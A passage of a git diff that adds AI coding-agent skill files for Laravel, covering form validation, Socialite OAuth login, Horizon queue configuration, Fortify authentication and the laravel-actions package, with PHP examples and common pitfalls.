+Instead of `withoutExceptionHandling()`, use `Exceptions::fake()` to assert the correct exception was reported while the request completes normally.
+
+## Call `Event::fake()` After Factory Setup
+
+Model factories rely on model events (e.g., `creating` to generate UUIDs). Calling `Event::fake()` before factory calls silences those events, producing broken models.
+
+Incorrect: `Event::fake(); $user = User::factory()->create();`
+
+Correct: `$user = User::factory()->create(); Event::fake();`
+
+## Use `recycle()` to Share Relationship Instances Across Factories
+
+Without `recycle()`, nested factories create separate instances of the same conceptual entity.
+
+```php
+Ticket::factory()
+    ->recycle(Airline::factory()->create())
+    ->create();
+```
\ No newline at end of file
diff --git a/.claude/skills/laravel-best-practices/rules/validation.md b/.claude/skills/laravel-best-practices/rules/validation.md
new file mode 100644
index 000000000..a20202ff1
--- /dev/null
+++ b/.claude/skills/laravel-best-practices/rules/validation.md
@@ -0,0 +1,75 @@
+# Validation & Forms Best Practices
+
+## Use Form Request Classes
+
+Extract validation from controllers into dedicated Form Request classes.
+
+Incorrect:
+```php
+public function store(Request $request)
+{
+    $request->validate([
+        'title' => 'required|max:255',
+        'body' => 'required',
+    ]);
+}
+```
+
+Correct:
+```php
+public function store(StorePostRequest $request)
+{
+    Post::create($request->validated());
+}
+```
+
+## Array vs. String Notation for Rules
+
+Array syntax is more readable and composes cleanly with `Rule::` objects. Prefer it in new code, but check existing Form Requests first and match whatever notation the project already uses.
+
+```php
+// Preferred for new code
+'email' => ['required', 'email', Rule::unique('users')],
+
+// Follow existing convention if the project uses string notation
+'email' => 'required|email|unique:users',
+```
+
+## Always Use `validated()`
+
+Get only validated data. Never use `$request->all()` for mass operations.
+
+Incorrect:
+```php
+Post::create($request->all());
+```
+
+Correct:
+```php
+Post::create($request->validated());
+```
+
+## Use `Rule::when()` for Conditional Validation
+
+```php
+'company_name' => [
+    Rule::when($this->account_type === 'business', ['required', 'string', 'max:255']),
+],
+```
+
+## Use the `after()` Method for Custom Validation
+
+Use `after()` instead of `withValidator()` for custom validation logic that depends on multiple fields.
+
+```php
+public function after(): array
+{
+    return [
+        function (Validator $validator) {
+            if ($this->quantity > Product::find($this->product_id)?->stock) {
+                $validator->errors()->add('quantity', 'Not enough stock.');
+            }
+        },
+    ];
+}
+```
\ No newline at end of file
diff --git a/.claude/skills/socialite-development/SKILL.md b/.claude/skills/socialite-development/SKILL.md
new file mode 100644
index 000000000..e660da691
--- /dev/null
+++ b/.claude/skills/socialite-development/SKILL.md
@@ -0,0 +1,80 @@
+---
+name: socialite-development
+description: "Manages OAuth social authentication with Laravel Socialite. Activate when adding social login providers; configuring OAuth redirect/callback flows; retrieving authenticated user details; customizing scopes or parameters; setting up community providers; testing with Socialite fakes; or when the user mentions social login, OAuth, Socialite, or third-party authentication."
+license: MIT
+metadata:
+  author: laravel
+---
+
+# Socialite Authentication
+
+## Documentation
+
+Use `search-docs` for detailed Socialite patterns and documentation (installation, configuration, routing, callbacks, testing, scopes, stateless auth).
+
+## Available Providers
+
+Built-in: `facebook`, `twitter`, `twitter-oauth-2`, `linkedin`, `linkedin-openid`, `google`, `github`, `gitlab`, `bitbucket`, `slack`, `slack-openid`, `twitch`
+
+Community: 150+ additional providers at [socialiteproviders.com](https://socialiteproviders.com). For provider-specific setup, use `WebFetch` on `https://socialiteproviders.com/{provider-name}`.
+
+Configuration key in `config/services.php` must match the driver name exactly — note the hyphenated keys: `twitter-oauth-2`, `linkedin-openid`, `slack-openid`.
+
+Twitter/X: Use `twitter-oauth-2` (OAuth 2.0) for new projects. The legacy `twitter` driver is OAuth 1.0. Driver names remain unchanged despite the platform rebrand.
+
+Community providers differ from built-in providers in the following ways:
+- Installed via `composer require socialiteproviders/{name}`
+- Must register via event listener — NOT auto-discovered like built-in providers
+- Use `search-docs` for the registration pattern
+
+## Adding a Provider
+
+### 1. Configure the provider
+
+Add the provider's `client_id`, `client_secret`, and `redirect` to `config/services.php`. The config key must match the driver name exactly.
+
+### 2. Create redirect and callback routes
+
+Two routes are needed: one that calls `Socialite::driver('provider')->redirect()` to send the user to the OAuth provider, and one that calls `Socialite::driver('provider')->user()` to receive the callback and retrieve user details.
+
+### 3. Authenticate and store the user
+
+In the callback, use `updateOrCreate` to find or create a user record from the provider's response (`id`, `name`, `email`, `token`, `refreshToken`), then call `Auth::login()`.
+
+### 4. Customize the redirect (optional)
+
+- `scopes()` — merge additional scopes with the provider's defaults
+- `setScopes()` — replace all scopes entirely
+- `with()` — pass optional parameters (e.g., `['hd' => 'example.com']` for Google)
+- `asBotUser()` — Slack only; generates a bot token (`xoxb-`) instead of a user token (`xoxp-`). Must be called before both `redirect()` and `user()`. Only the `token` property will be hydrated on the user object.
+- `stateless()` — for API/SPA contexts where session state is not maintained
+
+### 5. Verify
+
+1. Config key matches driver name exactly (check the list above for hyphenated names)
+2. `client_id`, `client_secret`, and `redirect` are all present
+3. Redirect URL matches what is registered in the provider's OAuth dashboard
+4. Callback route handles denied grants (when user declines authorization)
+
+Use `search-docs` for complete code examples of each step.
+
+## Additional Features
+
+Use `search-docs` for usage details on: `enablePKCE()`, `userFromToken($token)`, `userFromTokenAndSecret($token, $secret)` (OAuth 1.0), retrieving user details.
+
+User object: `getId()`, `getName()`, `getEmail()`, `getAvatar()`, `getNickname()`, `token`, `refreshToken`, `expiresIn`, `approvedScopes`
+
+## Testing
+
+Socialite provides `Socialite::fake()` for testing redirects and callbacks. Use `search-docs` for faking redirects, callback user data, custom token properties, and assertion methods.
+
+## Common Pitfalls
+
+- Config key must match driver name exactly — hyphenated drivers need hyphenated keys (`linkedin-openid`, `slack-openid`, `twitter-oauth-2`). Mismatch silently fails.
+- Every provider needs `client_id`, `client_secret`, and `redirect` in `config/services.php`. Missing any one causes cryptic errors.
+- `scopes()` merges with defaults; `setScopes()` replaces all scopes entirely.
+- Missing `stateless()` in API/SPA contexts causes `InvalidStateException`.
+- Redirect URL in `config/services.php` must exactly match the provider's OAuth dashboard (including trailing slashes and protocol).
+- Do not pass `state`, `response_type`, `client_id`, `redirect_uri`, or `scope` via `with()` — these are reserved.
+- Community providers require event listener registration via `SocialiteWasCalled`.
+- `user()` throws when the user declines authorization. Always handle denied grants.
\ No newline at end of file
diff --git a/.cursor/skills/configuring-horizon/SKILL.md b/.cursor/skills/configuring-horizon/SKILL.md
new file mode 100644
index 000000000..bed1e74c0
--- /dev/null
+++ b/.cursor/skills/configuring-horizon/SKILL.md
@@ -0,0 +1,85 @@
+---
+name: configuring-horizon
+description: "Use this skill whenever the user mentions Horizon by name in a Laravel context. Covers the full Horizon lifecycle: installing Horizon (horizon:install, Sail setup), configuring config/horizon.php (supervisor blocks, queue assignments, balancing strategies, minProcesses/maxProcesses), fixing the dashboard (authorization via Gate::define viewHorizon, blank metrics, horizon:snapshot scheduling), and troubleshooting production issues (worker crashes, timeout chain ordering, LongWaitDetected notifications, waits config). Also covers job tagging and silencing. Do not use for generic Laravel queues without Horizon, SQS or database drivers, standalone Redis setup, Linux supervisord, Telescope, or job batching."
+license: MIT
+metadata:
+  author: laravel
+---
+
+# Horizon Configuration
+
+## Documentation
+
+Use `search-docs` for detailed Horizon patterns and documentation covering configuration, supervisors, balancing, dashboard authorization, tags, notifications, metrics, and deployment.
+
+For deeper guidance on specific topics, read the relevant reference file before implementing:
+
+- `references/supervisors.md` covers supervisor blocks, balancing strategies, multi-queue setups, and auto-scaling
+- `references/notifications.md` covers LongWaitDetected alerts, notification routing, and the `waits` config
+- `references/tags.md` covers job tagging, dashboard filtering, and silencing noisy jobs
+- `references/metrics.md` covers the blank metrics dashboard, snapshot scheduling, and retention config
+
+## Basic Usage
+
+### Installation
+
+```bash
+php artisan horizon:install
+```
+
+### Supervisor Configuration
+
+Define supervisors in `config/horizon.php`. The `environments` array merges into `defaults` and does not replace the whole supervisor block:
+
+<!-- Supervisor Config -->
+```php
+'defaults' => [
+    'supervisor-1' => [
+        'connection' => 'redis',
+        'queue' => ['default'],
+        'balance' => 'auto',
+        'minProcesses' => 1,
+        'maxProcesses' => 10,
+        'tries' => 3,
+    ],
+],
+
+'environments' => [
+    'production' => [
+        'supervisor-1' => ['maxProcesses' => 20, 'balanceCooldown' => 3],
+    ],
+    'local' => [
+        'supervisor-1' => ['maxProcesses' => 2],
+    ],
+],
+```
+
+### Dashboard Authorization
+
+Restrict access in `App\Providers\HorizonServiceProvider`:
+
+<!-- Dashboard Gate -->
+```php
+protected function gate(): void
+{
+    Gate::define('viewHorizon', function (User $user) {
+        return $user->is_admin;
+    });
+}
+```
+
+## Verification
+
+1. Run `php artisan horizon` and visit `/horizon`
+2. Confirm dashboard access is restricted as expected
+3. Check that metrics populate after scheduling `horizon:snapshot`
+
+## Common Pitfalls
+
+- Horizon only works with the Redis queue driver. Other drivers such as database and SQS are not supported.
+- Redis Cluster is not supported. Horizon requires a standalone Redis connection.
+- Always check `config/horizon.php` before making changes to understand the current supervisor and environment configuration.
+- The `environments` array overrides only the keys you specify. It merges into `defaults` and does not replace it.
+- The timeout chain must be ordered: job `timeout` less than supervisor `timeout` less than `retry_after`. The wrong order can cause jobs to be retried before Horizon finishes timing them out.
+- The metrics dashboard stays blank until `horizon:snapshot` is scheduled. Running `php artisan horizon` alone does not populate metrics.
+- Always use `search-docs` for the latest Horizon documentation rather than relying on this skill alone.
\ No newline at end of file
diff --git a/.cursor/skills/configuring-horizon/references/metrics.md b/.cursor/skills/configuring-horizon/references/metrics.md
new file mode 100644
index 000000000..312f79ee7
--- /dev/null
+++ b/.cursor/skills/configuring-horizon/references/metrics.md
@@ -0,0 +1,21 @@
+# Metrics & Snapshots
+
+## Where to Find It
+
+Search with `search-docs`:
+- `"horizon metrics snapshot"` for the snapshot command and scheduling
+- `"horizon trim snapshots"` for retention configuration
+
+## What to Watch For
+
+### Metrics dashboard stays blank until `horizon:snapshot` is scheduled
+
+Running `horizon` artisan command does not populate metrics automatically. The metrics graph is built from snapshots, so `horizon:snapshot` must be scheduled to run every 5 minutes via Laravel's scheduler.
+
+### Register the snapshot in the scheduler rather than running it manually
+
+A single manual run populates the dashboard momentarily but will not keep it updated. Search `"horizon metrics snapshot"` for the exact scheduler registration syntax, which differs between Laravel 10 and 11+.
+
+### `metrics.trim_snapshots` is a snapshot count, not a time duration
+
+The `trim_snapshots.job` and `trim_snapshots.queue` values in `config/horizon.php` are counts of snapshots to keep, not minutes or hours. With the default of 24 snapshots at 5-minute intervals, that provides 2 hours of history. Increase the value to retain more history at the cost of Redis memory usage.
\ No newline at end of file
diff --git a/.cursor/skills/configuring-horizon/references/notifications.md b/.cursor/skills/configuring-horizon/references/notifications.md
new file mode 100644
index 000000000..943d1a26a
--- /dev/null
+++ b/.cursor/skills/configuring-horizon/references/notifications.md
@@ -0,0 +1,21 @@
+# Notifications & Alerts
+
+## Where to Find It
+
+Search with `search-docs`:
+- `"horizon notifications"` for Horizon's built-in notification routing helpers
+- `"horizon long wait detected"` for LongWaitDetected event details
+
+## What to Watch For
+
+### `waits` in `config/horizon.php` controls the LongWaitDetected threshold
+
+The `waits` array (e.g., `'redis:default' => 60`) defines how many seconds a job can wait in a queue before Horizon fires a `LongWaitDetected` event. This value is set in the config file, not in Horizon's notification routing. If alerts are firing too often or too late, adjust `waits` rather than the routing configuration.
+
+### Use Horizon's built-in notification routing in `HorizonServiceProvider`
+
+Configure notifications in the `boot()` method of `App\Providers\HorizonServiceProvider` using `Horizon::routeMailNotificationsTo()`, `Horizon::routeSlackNotificationsTo()`, or `Horizon::routeSmsNotificationsTo()`. Horizon already wires `LongWaitDetected` to its notification sender, so the documented setup is notification routing rather than manual listener registration.
+
+### Failed job alerts are separate from Horizon's documented notification routing
+
+Horizon's 12.x documentation covers built-in long-wait notifications. Do not assume the docs provide a `JobFailed` listener example in `HorizonServiceProvider`. If a user needs failed job alerts, treat that as custom queue event handling and consult the queue documentation instead of Horizon's notification-routing API.
\ No newline at end of file
diff --git a/.cursor/skills/configuring-horizon/references/supervisors.md b/.cursor/skills/configuring-horizon/references/supervisors.md
new file mode 100644
index 000000000..9da0c1769
--- /dev/null
+++ b/.cursor/skills/configuring-horizon/references/supervisors.md
@@ -0,0 +1,27 @@
+# Supervisor & Balancing Configuration
+
+## Where to Find It
+
+Search with `search-docs` before writing any supervisor config, as option names and defaults change between Horizon versions:
+- `"horizon supervisor configuration"` for the full options list
+- `"horizon balancing strategies"` for auto, simple, and false modes
+- `"horizon autoscaling workers"` for autoScalingStrategy details
+- `"horizon environment configuration"` for the defaults and environments merge
+
+## What to Watch For
+
+### The `environments` array merges into `defaults` rather than replacing it
+
+The `defaults` array defines the complete base supervisor config. The `environments` array patches it per environment, overriding only the keys listed. There is no need to repeat every key in each environment block. A common pattern is to define `connection`, `queue`, `balance`, `autoScalingStrategy`, `tries`, and `timeout` in `defaults`, then override only `maxProcesses`, `balanceMaxShift`, and `balanceCooldown` in `production`.
+
+### Use separate named supervisors to enforce queue priority
+
+Horizon does not enforce queue order when using `balance: auto` on a single supervisor. The `queue` array order is ignored for load balancing. To process `notifications` before `default`, use two separately named supervisors: one for the high-priority queue with a higher `maxProcesses`, and one for the low-priority queue with a lower cap. The docs include an explicit note about this.
+
+### Use `balance: false` to keep a fixed number of workers on a dedicated queue
+
+Auto-balancing suits variable load, but if a queue should always have exactly N workers such as a video-processing queue limited to 2, set `balance: false` and `maxProcesses: 2`. Auto-balancing would scale it up during bursts, which may be undesirable.
+
+### Set `balanceCooldown` to prevent rapid worker scaling under bursty load
+
+When using `balance: auto`, the supervisor can scale up and down rapidly under bursty load. Set `balanceCooldown` to the number of seconds between scaling decisions, typically 3 to 5, to smooth this out. `balanceMaxShift` limits how many processes are added or removed per cycle.
\ No newline at end of file
diff --git a/.cursor/skills/configuring-horizon/references/tags.md b/.cursor/skills/configuring-horizon/references/tags.md
new file mode 100644
index 000000000..263c955c1
--- /dev/null
+++ b/.cursor/skills/configuring-horizon/references/tags.md
@@ -0,0 +1,21 @@
+# Tags & Silencing
+
+## Where to Find It
+
+Search with `search-docs`:
+- `"horizon tags"` for the tagging API and auto-tagging behaviour
+- `"horizon silenced jobs"` for the `silenced` and `silenced_tags` config options
+
+## What to Watch For
+
+### Eloquent model jobs are tagged automatically without any extra code
+
+If a job's constructor accepts Eloquent model instances, Horizon automatically tags the job with `ModelClass:id` such as `App\Models\User:42`. These tags are filterable in the dashboard without any changes to the job class. Only add a `tags()` method when custom tags beyond auto-tagging are needed.
+
+### `silenced` hides jobs from the dashboard completed list but does not stop them from running
+
+Adding a job class to the `silenced` array in `config/horizon.php` removes it from the completed jobs view. The job still runs normally. This is a dashboard noise-reduction tool, not a way to disable jobs.
+
+### `silenced_tags` hides all jobs carrying a matching tag from the completed list
+
+Any job carrying a matching tag string is hidden from the completed jobs view. This is useful for silencing a category of jobs such as all jobs tagged `notifications`, rather than silencing specific classes.
\ No newline at end of file
diff --git a/.cursor/skills/fortify-development/SKILL.md b/.cursor/skills/fortify-development/SKILL.md
new file mode 100644
index 000000000..86322d9c0
--- /dev/null
+++ b/.cursor/skills/fortify-development/SKILL.md
@@ -0,0 +1,131 @@
+---
+name: fortify-development
+description: 'ACTIVATE when the user works on authentication in Laravel. This includes login, registration, password reset, email verification, two-factor authentication (2FA/TOTP/QR codes/recovery codes), profile updates, password confirmation, or any auth-related routes and controllers. Activate when the user mentions Fortify, auth, authentication, login, register, signup, forgot password, verify email, 2FA, or references app/Actions/Fortify/, CreateNewUser, UpdateUserProfileInformation, FortifyServiceProvider, config/fortify.php, or auth guards. Fortify is the frontend-agnostic authentication backend for Laravel that registers all auth routes and controllers. Also activate when building SPA or headless authentication, customizing login redirects, overriding response contracts like LoginResponse, or configuring login throttling. Do NOT activate for Laravel Passport (OAuth2 API tokens), Socialite (OAuth social login), or non-auth Laravel features.'
+license: MIT
+metadata:
+  author: laravel
+---
+
+# Laravel Fortify Development
+
+Fortify is a headless authentication backend that provides authentication routes and controllers for Laravel applications.
+
+## Documentation
+
+Use `search-docs` for detailed Laravel Fortify patterns and documentation.
+
+## Usage
+
+- **Routes**: Use `list-routes` with `only_vendor: true` and `action: "Fortify"` to see all registered endpoints
+- **Actions**: Check `app/Actions/Fortify/` for customizable business logic (user creation, password validation, etc.)
+- **Config**: See `config/fortify.php` for all options including features, guards, rate limiters, and username field
+- **Contracts**: Look in `Laravel\Fortify\Contracts\` for overridable response classes (`LoginResponse`, `LogoutResponse`, etc.)
+- **Views**: All view callbacks are set in `FortifyServiceProvider::boot()` using `Fortify::loginView()`, `Fortify::registerView()`, etc.
+
+## Available Features
+
+Enable in `config/fortify.php` features array:
+
+- `Features::registration()` - User registration
+- `Features::resetPasswords()` - Password reset via email
+- `Features::emailVerification()` - Requires User to implement `MustVerifyEmail`
+- `Features::updateProfileInformation()` - Profile updates
+- `Features::updatePasswords()` - Password changes
+- `Features::twoFactorAuthentication()` - 2FA with QR codes and recovery codes
+
+> Use `search-docs` for feature configuration options and customization patterns.
+
+## Setup Workflows
+
+### Two-Factor Authentication Setup
+
+```
+- [ ] Add TwoFactorAuthenticatable trait to User model
+- [ ] Enable feature in config/fortify.php
+- [ ] If the `*_add_two_factor_columns_to_users_table.php` migration is missing, publish via `php artisan vendor:publish --tag=fortify-migrations` and migrate
+- [ ] Set up view callbacks in FortifyServiceProvider
+- [ ] Create 2FA management UI
+- [ ] Test QR code and recovery codes
+```
+
+> Use `search-docs` for TOTP implementation and recovery code handling patterns.
+
+### Email Verification Setup
+
+```
+- [ ] Enable emailVerification feature in config
+- [ ] Implement MustVerifyEmail interface on User model
+- [ ] Set up verifyEmailView callback
+- [ ] Add verified middleware to protected routes
+- [ ] Test verification email flow
+```
+
+> Use `search-docs` for MustVerifyEmail implementation patterns.
+
+### Password Reset Setup
+
+```
+- [ ] Enable resetPasswords feature in config
+- [ ] Set up requestPasswordResetLinkView callback
+- [ ] Set up resetPasswordView callback
+- [ ] Define password.reset named route (if views disabled)
+- [ ] Test reset email and link flow
+```
+
+> Use `search-docs` for custom password reset flow patterns.
+
+### SPA Authentication Setup
+
+```
+- [ ] Set 'views' => false in config/fortify.php
+- [ ] Install and configure Laravel Sanctum for session-based SPA authentication
+- [ ] Use the 'web' guard in config/fortify.php (required for session-based authentication)
+- [ ] Set up CSRF token handling
+- [ ] Test XHR authentication flows
+```
+
+> Use `search-docs` for integration and SPA authentication patterns.
+
+#### Two-Factor Authentication in SPA Mode
+
+When `views` is set to `false`, Fortify returns JSON responses instead of redirects.
+
+If a user attempts to log in and two-factor authentication is enabled, the login request will return a JSON response indicating that a two-factor challenge is required:
+
+```json
+{
+    "two_factor": true
+}
+```
+
+## Best Practices
+
+### Custom Authentication Logic
+
+Override authentication behavior using `Fortify::authenticateUsing()` for custom user retrieval or `Fortify::authenticateThrough()` to customize the authentication pipeline. Override response contracts in `AppServiceProvider` for custom redirects.
+
+### Registration Customization
+
+Modify `app/Actions/Fortify/CreateNewUser.php` to customize user creation logic, validation rules, and additional fields.
+
+### Rate Limiting
+
+Configure via `fortify.limiters.login` in config. Default configuration throttles by username + IP combination.
+
+## Key Endpoints
+
+| Feature                | Method   | Endpoint                                    |
+|------------------------|----------|---------------------------------------------|
+| Login                  | POST     | `/login`                                    |
+| Logout                 | POST     | `/logout`                                   |
+| Register               | POST     | `/register`                                 |
+| Password Reset Request | POST     | `/forgot-password`                          |
+| Password Reset         | POST     | `/reset-password`                           |
+| Email Verify Notice    | GET      | `/email/verify`                             |
+| Resend Verification    | POST     | `/email/verification-notification`          |
+| Password Confirm       | POST     | `/user/confirm-password`                    |
+| Enable 2FA             | POST     | `/user/two-factor-authentication`           |
+| Confirm 2FA            | POST     | `/user/confirmed-two-factor-authentication` |
+| 2FA Challenge          | POST     | `/two-factor-challenge`                     |
+| Get QR Code            | GET      | `/user/two-factor-qr-code`                  |
+| Recovery Codes         | GET/POST | `/user/two-factor-recovery-codes`           |
\ No newline at end of file
diff --git a/.cursor/skills/laravel-actions/SKILL.md b/.cursor/skills/laravel-actions/SKILL.md
new file mode 100644
index 000000000..862dd55b5
--- /dev/null
+++ b/.cursor/skills/laravel-actions/SKILL.md
@@ -0,0 +1,302 @@
+---
+name: laravel-actions
+description: Build, refactor, and troubleshoot Laravel Actions using lorisleiva/laravel-actions. Use when implementing reusable action classes (object/controller/job/listener/command), converting service classes/controllers/jobs into actions, orchestrating workflows via faked actions, or debugging action entrypoints and wiring.
+---
+
+# Laravel Actions or `lorisleiva/laravel-actions`
+
+## Overview
+
+Use this skill to implement or update actions based on `lorisleiva/laravel-actions` with consistent structure and predictable testing patterns.
+
+## Quick Workflow
+
+1. Confirm the package is installed with `composer show lorisleiva/laravel-actions`.
+2. Create or edit an action class that uses `Lorisleiva\Actions\Concerns\AsAction`.
+3. Implement `handle(...)` with the core business logic first.
+4. Add adapter methods only when needed for the requested entrypoint:
+   - `asController` (+ route/invokable controller usage)
+   - `asJob` (+ dispatch)
+   - `asListener` (+ event listener wiring)
+   - `asCommand` (+ command signature/description)
+5. Add or update tests for the chosen entrypoint.
+6. When tests need isolation, use action fakes (`MyAction::fake()`) and assertions (`MyAction::assertDispatched()`).
+
+## Base Action Pattern
+
+Use this minimal skeleton and expand only what is needed.
+
+```php
+<?php
+
+namespace App\Actions;
+
+use Lorisleiva\Actions\Concerns\AsAction;
+
+class PublishArticle
+{
+    use AsAction;
+
+    public function handle(int $articleId): bool
+    {
+        return true;
+    }
+}
+```
+
+## Project Conventions
+
+- Place action classes in `App\Actions` unless an existing domain sub-namespace is already used.
+- Use descriptive `VerbNoun` naming (e.g. `PublishArticle`, `SyncVehicleTaxStatus`).
+- Keep domain/business logic in `handle(...)`; keep transport and framework concerns in adapter methods (`asController`, `asJob`, `asListener`, `asCommand`).
+- Prefer explicit parameter and return types in all action methods.
+- Prefer PHPDoc for complex data contracts (e.g. array shapes), not inline comments.
+
+### When to Use an Action
+
+- Use an Action when the same use-case needs multiple entrypoints (HTTP, queue, event, CLI) or benefits from first-class orchestration/faking.
+- Keep a plain service class when logic is local, single-entrypoint, and unlikely to be reused as an Action.
+
+## Entrypoint Patterns
+
+### Run as Object
+
+- (prefer method) Use static helper from the trait: `PublishArticle::run($id)`.
+- Use make and call handle: `PublishArticle::make()->handle($id)`.
+- Call with dependency injection: `app(PublishArticle::class)->handle($id)`.
+
+### Run as Controller
+
+- Use route to class (invokable style), e.g. `Route::post('/articles/{id}/publish', PublishArticle::class)`.
+- Add `asController(...)` for HTTP-specific adaptation and return a response.
+- Add request validation (`rules()` or custom validator hooks) when input comes from HTTP.
+
+### Run as Job
+
+- Dispatch with `PublishArticle::dispatch($id)`.
+- Use `asJob(...)` only for queue-specific behavior; keep domain logic in `handle(...)`.
+- In this project, job Actions often define additional queue lifecycle methods and job properties for retries, uniqueness, and timing control.
+
+#### Project Pattern: Job Action with Extra Methods
+
+```php
+<?php
+
+namespace App\Actions\Demo;
+
+use App\Models\Demo;
+use DateTime;
+use Lorisleiva\Actions\Concerns\AsAction;
+use Lorisleiva\Actions\Decorators\JobDecorator;
+
+class GetDemoData
+{
+    use AsAction;
+
+    public int $jobTries = 3;
+
+    public int $jobMaxExceptions = 3;
+
+    public function getJobRetryUntil(): DateTime
+    {
+        return now()->addMinutes(30);
+    }
+
+    public function getJobBackoff(): array
+    {
+        return [60, 120];
+    }
+
+    public function getJobUniqueId(Demo $demo): string
+    {
+        return $demo->id;
+    }
+
+    public function handle(Demo $demo): void
+    {
+        // Core business logic.
+    }
+
+    public function asJob(JobDecorator $job, Demo $demo): void
+    {
+        // Queue-specific orchestration and retry behavior.
+        $this->handle($demo);
+    }
+}
+```
+
+Use these members only when needed:
+
+- `$jobTries`: max attempts for the queued execution.
+- `$jobMaxExceptions`: max unhandled exceptions before failing.
+- `getJobRetryUntil()`: absolute retry deadline.
+- `getJobBackoff()`: retry delay strategy per attempt.
+- `getJobUniqueId(...)`: deduplication key for unique jobs.
+- `asJob(JobDecorator $job, ...)`: access attempt metadata and queue-only branching.
+
+### Run as Listener
+
+- Register the action class as listener in `EventServiceProvider`.
+- Use `asListener(EventName $event)` and delegate to `handle(...)`.
+
+### Run as Command
+
+- Define `$commandSignature` and `$commandDescription` properties.
+- Implement `asCommand(Command $command)` and keep console IO in this method only.
+- Import `Command` with `use Illuminate\Console\Command;`.
+
+## Testing Guidance
+
+Use a two-layer strategy:
+
+1. `handle(...)` tests for business correctness.
+2. entrypoint tests (`asController`, `asJob`, `asListener`, `asCommand`) for wiring/orchestration.
+
+### Deep Dive: `AsFake` methods (2.x)
+
+Reference: https://www.laravelactions.com/2.x/as-fake.html
+
+Use these methods intentionally based on what you want to prove.
+
+#### `mock()`
+
+- Replaces the action with a full mock.
+- Best when you need strict expectations and argument assertions.
+
+```php
+PublishArticle::mock()
+    ->shouldReceive('handle')
+    ->once()
+    ->with(42)
+    ->andReturnTrue();
+```
+
+#### `partialMock()`
+
+- Replaces the action with a partial mock.
+- Best when you want to keep most real behavior but stub one expensive/internal method.
+
+```php
+PublishArticle::partialMock()
+    ->shouldReceive('fetchRemoteData')
+    ->once()
+    ->andReturn(['ok' => true]);
+```
+
+#### `spy()`
+
+- Replaces the action with a spy.
+- Best for post-execution verification ("was called with X") without predefining all expectations.
+
+```php
+$spy = PublishArticle::spy()->allows('handle')->andReturnTrue();
+
+// execute code that triggers the action...
+
+$spy->shouldHaveReceived('handle')->with(42);
+```
+
+#### `shouldRun()`
+
+- Shortcut for `mock()->shouldReceive('handle')`.
+- Best for compact orchestration assertions.
+
+```php
+PublishArticle::shouldRun()->once()->with(42)->andReturnTrue();
+```
+
+#### `shouldNotRun()`
+
+- Shortcut for `mock()->shouldNotReceive('handle')`.
+- Best for guard-clause tests and branch coverage.
+
+```php
+PublishArticle::shouldNotRun();
+```
+
+#### `allowToRun()`
+
+- Shortcut for spy + allowing `handle`.
+- Best when you want execution to proceed but still assert interaction.
+
+```php
+$spy = PublishArticle::allowToRun()->andReturnTrue();
+// ...
+$spy->shouldHaveReceived('handle')->once();
+```
+
+#### `isFake()` and `clearFake()`
+
+- `isFake()` checks whether the class is currently swapped.
+- `clearFake()` resets the fake and prevents cross-test leakage.
+
+```php
+expect(PublishArticle::isFake())->toBeFalse();
+PublishArticle::mock();
+expect(PublishArticle::isFake())->toBeTrue();
+PublishArticle::clearFake();
+expect(PublishArticle::isFake())->toBeFalse();
+```
+
+### Recommended test matrix for Actions
+
+- Business rule test: call `handle(...)` directly with real dependencies/factories.
+- HTTP wiring test: hit route/controller, fake downstream actions with `shouldRun` or `shouldNotRun`.
+- Job wiring test: dispatch action as job, assert expected downstream action calls.
+- Event listener test: dispatch event, assert action interaction via fake/spy.
+- Console test: run artisan command, assert action invocation and output.
+
+### Practical defaults
+
+- Prefer `shouldRun()` and `shouldNotRun()` for readability in branch tests.
+- Prefer `spy()`/`allowToRun()` when behavior is mostly real and you only need call verification.
+- Prefer `mock()` when interaction contracts are strict and should fail fast.
+- Use `clearFake()` in cleanup when a fake might leak into another test.
+- Keep side effects isolated: fake only the action under test boundary, not everything.
+
+### Pest style examples
+
+```php
+it('dispatches the downstream action', function () {
+    SendInvoiceEmail::shouldRun()->once()->withArgs(fn (int $invoiceId) => $invoiceId > 0);
+
+    FinalizeInvoice::run(123);
+});
+
+it('does not dispatch when invoice is already sent', function () {
+    SendInvoiceEmail::shouldNotRun();
+
+    FinalizeInvoice::run(123, alreadySent: true);
+});
+```
+
+Run the minimum relevant suite first, e.g. `php artisan test --compact --filter=PublishArticle` or by specific test file.
+
+## Troubleshooting Checklist
+
+- Ensure the class uses `AsAction` and namespace matches autoload.
+- Check route registration when used as controller.
+- Check queue config when using `dispatch`.
+- Verify event-to-listener mapping in `EventServiceProvider`.
+- Keep transport concerns in adapter methods (`asController`, `asCommand`, etc.), not in `handle(...)`.
+
+## Common Pitfalls
+
+- Putting HTTP response/redirect logic inside `handle(...)` instead of `asController(...)`.
+- Duplicating business rules across `as*` methods rather than delegating to `handle(...)`.
+- Assuming listener wiring works without explicit registration where required.
+- Testing only entrypoints and skipping direct `handle(...)` behavior tests.
+- Overusing Actions for one-off, single-context logic with no reuse pressure.
+
+## Topic References
+
+Use these references for deep dives by entrypoint/topic. Keep `SKILL.md` focused on workflow and decision rules.
+
+- Object entrypoint: `references/object.md`
+- Controller entrypoint: `references/controller.md`
+- Job entrypoint: `references/job.md`
+- Listener entrypoint: `references/listener.md`
+- Command entrypoint: `references/command.md`
+- With attributes: `references/with-attributes.md`
+- Testing and fakes: `references/testing-fakes.md`
+- Troubleshooting: `references/troubleshooting.md`
\ No newline at end of file
diff --git a/.cursor/skills/laravel-actions/references/command.md b/.cursor/skills/laravel-actions/references/command.md
new file mode 100644
index 000000000..a7b255daf
--- /dev/null
+++ b/.cursor/skills/laravel-actions/references/command.md
@@ -0,0 +1,160 @@
+# Command Entrypoint (`asCommand`)
+
+## Scope
+
+Use this reference when exposing actions as Artisan commands.
+
+## Recap
+
+- Documents command execution via `asCommand(...)` and fallback to `handle(...)`.
+- Covers command metadata via methods/properties (signature, description, help, hidden).
+- Includes registration example and focused artisan test pattern.
+- Reinforces separation between console I/O and domain logic.
+
+## Recommended pattern
+
+- Define `$commandSignature` and `$commandDescription`.
+- Implement `asCommand(Command $command)` for console I/O.
+- Keep business logic in `handle(...)`.
+
+## Methods used (`CommandDecorator`)
+
+### `asCommand`
+
+Called when executed as a command. If missing, it falls back to `handle(...)`.
+
+```php
+use Illuminate\Console\Command;
+
+class UpdateUserRole
+{
+    use AsAction;
+
+    public string $commandSignature = 'users:update-role {user_id} {role}';
+
+    public function handle(User $user, string $newRole): void
+    {
+        $user->update(['role' => $newRole]);
+    }
+
+    public function asCommand(Command $command): void
+    {
+        $this->handle(
+            User::findOrFail($command->argument('user_id')),
+            $command->argument('role')
+        );
+
+        $command->info('Done!');
+    }
+}
+```
+
